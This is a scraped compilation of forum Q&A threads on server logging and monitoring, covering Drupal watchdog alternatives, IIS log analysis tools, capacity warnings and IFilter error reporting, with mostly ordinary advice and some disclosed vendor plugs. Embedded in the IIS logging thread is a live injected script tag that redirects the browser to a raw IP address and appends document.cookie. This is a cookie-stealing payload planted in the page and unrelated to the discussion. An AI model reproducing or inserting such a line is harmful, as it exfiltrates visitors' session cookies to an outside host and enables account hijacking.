Securing Drupal: Alternative to Watchdog? - security

Hi Im going though and securing a site I have that runs drupal 7 using the security review module. One of the recommendations is to not use watchdog to log events to the screen I.E the data base I guess. If I turn that off would there be another secure way to send logs to my workstation so that I can monitor traffic to the site. I.E what people view, broken links and the like?
I'm on a shared host, not a dedicated host. I did a search on some different ways to do this, but I really dont know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I am not formatting this question correctly, but i'm not to clear on how to do this.

Are you sure the recommandation is about Drupal's watchdog? Not about displaying error message on the pages. These are two different things.
That said, in Drupal, the watchdog is only an API to log system messages. Where the messages go, how they are actually logged, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log message to the database. A syslog module is also provided, but not really an option if you are on a shared hosting. A quick search reveal modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.

If you have a gigantic site with millions a hits a day then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing its a shared host, it's not a high profile site. Using watchdog is fine.

Related

How to Design a web application to monitor server status in web browser

I just want to try creating a web application to monitor server status. I need some design guidelines.
Should I use some scripting language like Python or ruby to get the stats? Is polling is the only way to do it? If so how frequently should we poll?
If you don't care about data retention, writing a simple web app in ruby or python that polls from the browser would probably be fine. You could alternately use websockets and push data from a CLI-based monitoring agent of some sort that ran in the background on your server.
If you don't care about data fidelity, then you might be able to use something simple like pingdom.
If you do care about data retention and you need lots of custom monitoring, then it's a much harder problem. There are a number of open source projects and paid applications that will solve this problem in various ways. As mentioned in the comment on your post, ganglia could work. You might also look into nagios or munin. If you need app level stats, you could check out statsd/graphite or influxdb/grafana.
If you want server monitoring but don't want to manage additional infrastructure, there are a lot of solutions in the paid space including librato, newrelic, and instrumental.
Note: I am an owner of Instrumental, so I'm biased toward that, but I think your question needs more details to narrow down any recommendations on infrastructure monitoring.

what are the tools to parse/analyze IIS logs - ideally free/open source?

note: there are few similar questions already asked here - but they are from 2009. May be something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with the website based on IIS logs (i.e. 404, 500 responses, long page processing, etc)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this, I just want to periodically check if all is good with the website.
Second question (and I know most likely i'm asking for too much) - but is there any way to expose processed logs to web? So I can review things mentioned above without RPDing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates setup for IIS, and we can consolidate the logs in a database with web-access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also setup real-time alerts, so that you can get an email when a critical error is encountered in a log file, like a 500 error.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can setup comprehensive monitoring with a single product.
I'd look into #LuckyLuke solution (or similar) - classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job so IMHO its best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own log parser, and depending on how far you want to go with it, you can use it (COM dll) to write your "admin web pages" in .Net/ASP.Net and host it in each of your servers....
If you're very specific about the errors you just want to be alerted about, another "hacky" way would be to provide your own custom error pages (either the default IIS error pages, or configure your Asp.Net apps to use specific error pages).

How do I show a warning when server is over capacity to avoid server goes down?

Twitter sometimes shows an message: Twitter is over capacity
This is to prevent too much pressure on the servers. Which avoids that the servers go down.
How do I implement this in my application?
Edit: I am NOT looking for a PHP specific solution.
I thing this can be easily achieved by using a separate software to watch the server status, and on to much pressure, show the specified message. This is very important in a cloud architecture, so you can easily launch new instances. I think Amazon uses CloudWatch for this. Also, you could use apache mod_status to watch the server, also using a separate software.
Hope this helps, Gabriel

How to write my own Server Logging script?

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>

What's a good strategy for exposing fatal IFilter problems to the user?

How do I expose errors that occur inside an IFilter to the user?
The IFilter can be loaded by a variety of Microsoft products, server products like SharePoint included. It will be separated into modules one of which is an NT service for handling indexing huge files, connection will be performed via RPC. So just anything can go wrong - permissions can be insufficicent and RPC call will fail or whatever else. Until the problem is fixed the IFilter will just not work from the consumer application point of view.
How do I at least log the error messages in some convenient way? Should I just write a log file into Windows\System32 or is there some better way?
Where there is no way to communicate problems like this to the user, I've used (and often seen used) e-mail. There is great support for it in the .NET Framework and it works well.
The main thing to be careful of is to add protections to ensure users aren't spammed and mail servers don't get overloaded! In this situation or if mailing fails altogether, it's important to fall back to logging somewhere.
Also make sure to consider the audience and if it is appropriate to e-mail end users or an administrator for this particular type of message. Presumably an admin would be able to do something about it whereas a user would be confused.

Resources